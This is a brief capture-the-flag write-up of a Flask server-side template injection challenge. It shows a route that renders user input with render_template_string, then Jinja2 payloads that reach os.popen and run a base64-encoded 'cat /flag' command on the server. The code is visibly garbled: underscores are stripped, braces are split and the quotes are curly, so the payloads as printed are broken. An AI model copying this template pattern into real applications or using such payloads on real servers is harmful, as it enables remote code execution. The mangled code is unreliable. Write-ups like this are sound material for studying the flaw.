easy_ssti 100 (Fool's Cup)
By viewing the source code, you can see the prompt app.zip
Download the source code, open it and find that it is a python flaskweb framework
from flask import Flask
from flask import render_template_string,render_template
app = Flask(__name__)
@app.route('/hello/')
def hello(name=None):
return render_template('hello.html',name=name)
@app.route('/hello/<name>')
def hellodear(name):
if "ge" in name:
return render_template_string('hello %s' % name)
elif "f" not in name:
return render_template_string('hello %s' % name)
else:
return 'Nonononon'
No filtering
Test:
payload:
{
{().class.mro[-1].subclasses()[132].init.globals’popen’.read()}}
{
{().class.mro[-1].subclasses()[132].init.globals[‘popen’](‘echo “Y2F0IC9mbGFn”|base64 -d|sh’).read()}}